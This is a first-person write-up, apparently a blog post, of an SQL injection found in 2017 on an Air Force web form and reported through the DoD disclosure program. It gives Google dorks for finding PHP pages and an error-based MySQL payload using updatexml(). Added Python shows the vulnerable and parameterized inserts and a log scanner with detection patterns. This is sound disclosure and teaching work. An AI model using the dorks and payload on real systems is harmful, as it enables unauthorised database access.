Information is key. What sort of information could be in an Air Force Database?
Who would get hurt by that data? Who would it benefit?
In 2017, 17-year-old me easily gained access to an Air Force database.
Back then, I practiced in the DoD's Vulnerability Disclosure Program (VDP). I was looking at the Air Force subdomains and I decided to look for sites running PHP.
To do this, I used Google. If you use Google, you should know about Google Dorks. (If you don't, look them up!)
I looked up: site:*.af.mil + ext:php
and site:.af.mil + filetype:php.
I got a ton of results and I visited one:
https://███.af.mil/php/███/███.php
It was a form that asked for an email. So, I entered an email and submitted the form:
https://███.af.mil/php/███/███[email protected]
The application was likely saving my email to a database, so I decided to try SQL injection.
So, I tried the following: https://███.af.mil/php/███/███.php?email='
The application responded with an error message that the email address was invalid.
So, I tried the following: https://███.af.mil/php/███/███.php?email='@hackerone.mil
This time I got an SQL error!
You have an error in your SQL syntax
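The application's code was never published, so the following is an added example, not the site's own code: it reproduces the behaviour the post describes (a bare quote is rejected by a format check, but a quote followed by a domain passes and reaches the query) with a string-built INSERT, and puts the parameterized form beside it. The email regex, the in-memory SQLite table and the function names are assumptions chosen for illustration.

```python
import re
import sqlite3

# Loose validator standing in for the one the post describes: a bare quote is
# rejected, but a quote followed by "@domain.tld" passes. Assumed pattern.
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")


def looks_like_email(value: str) -> bool:
    """Format check only; it says nothing about whether the value is safe SQL."""
    return bool(EMAIL_RE.match(value))


def make_db() -> sqlite3.Connection:
    """In-memory table standing in for the signup table (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE signups (email TEXT NOT NULL)")
    return conn


def save_email_vulnerable(conn: sqlite3.Connection, email: str) -> str:
    """String-built INSERT: a quote in the input becomes SQL syntax."""
    if not looks_like_email(email):
        return "invalid email"
    try:
        conn.execute("INSERT INTO signups (email) VALUES ('" + email + "')")
        conn.commit()
        return "saved"
    except sqlite3.Error as exc:
        # Echoing the driver's message to the client is the leak that let the
        # post read the database version; log it server-side, do not return it.
        return "database error: " + str(exc)


def save_email_safe(conn: sqlite3.Connection, email: str) -> str:
    """Parameterized INSERT: the value is bound, never parsed as SQL."""
    if not looks_like_email(email):
        return "invalid email"
    conn.execute("INSERT INTO signups (email) VALUES (?)", (email,))
    conn.commit()
    return "saved"


def stored_emails(conn: sqlite3.Connection) -> list:
    return [row[0] for row in conn.execute("SELECT email FROM signups ORDER BY rowid")]


if __name__ == "__main__":
    db = make_db()
    for probe in ["'", "'@hackerone.mil", "alice@example.com"]:
        print(repr(probe), "->", save_email_vulnerable(db, probe), "/", save_email_safe(db, probe))
    print(stored_emails(db))
```

The format check is not a defence: it only decides which probes produce a visible error. The parameterized version stores the quoted value as data, and a generic "could not save" message with the driver error written to the server log would have removed the information leak.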
Sweet! It's MySQL! The application was showing raw database error messages. Knowing this, I wanted to extract information by triggering error messages through MySQL's XML functions.
The UpdateXML() function replaces an XML fragment and returns the result.
UpdateXML('xml', 'xpath_expression', 'new replacement')
If the function is given an invalid XPath expression, it throws an error.
So, I came up with the following:
https://███.af.mil/php/███/███.php?email=' and updatexml(null,concat(0x0a,version()),null)-- [email protected]
XPATH syntax error: ':5.6.24-log'
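From the defender's side, both the request and the response in this exchange are easy to spot. The following is an added example, not part of the report or the site: it scans constructed access-log lines (placeholder host and IP) for the markers the post shows, the MySQL XML functions and a quote followed by a SQL comment in a query value, and checks response bodies for the two error strings the application echoed. The log format, regexes and function names are assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Signals taken from the post: MySQL's XML functions used for error-based
# extraction, a quote followed by a SQL comment, and the two error strings
# the application echoed back.
XML_FUNCTIONS = re.compile(r"\b(updatexml|extractvalue)\s*\(", re.IGNORECASE)
SQL_COMMENT = re.compile(r"--(\s|$)|/\*")
DB_ERROR_MARKERS = ("You have an error in your SQL syntax", "XPATH syntax error")

# Request line of an Apache/nginx style access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Constructed sample log lines (not from the report); host, path and IP are placeholders.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2017:12:00:00 +0000] "GET /php/signup.php?email=alice%40example.com HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2017:12:00:05 +0000] "GET /php/signup.php?email=%27%20and%20updatexml(null%2Cconcat(0x0a%2Cversion())%2Cnull)--%20x%40example.com HTTP/1.1" 200 640',
    '203.0.113.5 - - [01/Jan/2017:12:00:09 +0000] "GET /php/signup.php?email=%27%40example.com HTTP/1.1" 200 640',
    '203.0.113.5 - - [01/Jan/2017:12:00:12 +0000] "GET /php/signup.php?email=%27--%20x%40example.com HTTP/1.1" 200 640',
]


def suspicious_params(target: str) -> list:
    """Return (param, reason) for query values that look like error-based SQLi probes."""
    findings = []
    # parse_qsl already percent-decodes, so the regexes see the raw payload.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if XML_FUNCTIONS.search(value):
            findings.append((name, "mysql xml function"))
        elif "'" in value and SQL_COMMENT.search(value):
            findings.append((name, "quote followed by sql comment"))
    return findings


def scan_access_log(lines) -> list:
    """Return (line index, param, reason) for every flagged request."""
    hits = []
    for idx, line in enumerate(lines):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        for name, reason in suspicious_params(m.group(1)):
            hits.append((idx, name, reason))
    return hits


def leaks_db_error(body: str):
    """Return the first database error marker found in a response body, else None."""
    for marker in DB_ERROR_MARKERS:
        if marker in body:
            return marker
    return None


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print("flagged line %d: param %s (%s)" % hit)
    print(leaks_db_error("<p>XPATH syntax error: ':5.6.24-log'</p>"))
```

The quiet second probe from the post, a quote followed by a domain, is deliberately not flagged on the request side because a lone apostrophe is common in legitimate input; it is the response-side check that catches it, since the application answered with the raw MySQL error. Alerting on database error strings leaving the application is therefore the more reliable signal, and removing them from responses is the fix.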
I stopped here and I reported it to the Department of Defense's vulnerability disclosure program on HackerOne.
You can see the redacted report here: https://hackerone.com/reports/277380